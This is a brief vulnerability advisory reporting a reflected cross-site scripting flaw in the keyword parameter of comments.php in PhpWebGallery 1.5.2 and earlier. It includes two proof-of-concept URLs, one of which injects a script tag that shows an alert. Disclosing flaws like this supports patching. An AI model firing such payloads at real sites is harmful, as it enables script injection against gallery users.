PhpWebGallery Cross Site Scripting Vulnerability

Produce : PhpWebGallery <= 1.5.2

Site    : http://www.phpwebgallery.net

Problem : XSS

Greetz  : hasnaa and all friends

Moroccan Security Research Team

Vulnerable file : comments.php

Exploit :

http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Eal
ert('Hi+Master');%3C/script%3E

Contact  : iss4m.h (at) gmail (dot) com [email concealed]